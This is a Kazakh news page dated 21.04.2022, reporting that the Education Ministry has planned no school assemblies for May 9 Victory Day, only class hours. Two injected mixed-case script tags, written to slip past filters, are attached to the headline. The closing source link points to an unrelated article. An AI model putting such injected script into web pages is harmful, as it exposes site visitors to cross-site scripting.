Мектептерде 9 мамыр – Жеңіс күніне орай жиын өткізу жоспарланбаған<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

21.04.2022

   ҚР Білім және ғылым министрлігінің баспасөз қызметі биыл мектептерде Ұлы Отан соғысының Жеңіс күніне орай жиын өткізу жоспарланбағанын жария етті, деп хабарлайды Zakon.kz.

«Мектептерде 7 және 9 мамырда аталып өтетін мерекелер қарсаңында патриоттық тәрбие беру, соғыс ардагерлерінің жеңіске қосқан үлесі, Отанға деген сүйіспеншілік, ізгілік, бейбітшілік пен келісімнің маңыздылығы тақырыптарында сынып сағаттары өткізіледі. Мектептерде 9 мамырға арналған жиын өткізу жоспарланып отырған жоқ», делінген хабарламада.

Сондай-ақ, аталған ведомстводан әскери киім мен атрибуттарды қолданып, театрландырылған көрініс қоюдың қажет еместігі айтылады.

«Білім беру ұйымдарына осы мәселе бойынша ұсыныстар жіберілді», делінген баспасөз қызметі хабарламасында.

Ссылка: https://kaz.zakon.kz/6005906-rudnyida-studentterdin-zhappai-ulanuy-boiynsha-tergeu-bastaldy.html

Просмотров: 597


Пікір қосу



Деректерді қолтаңбаға қосу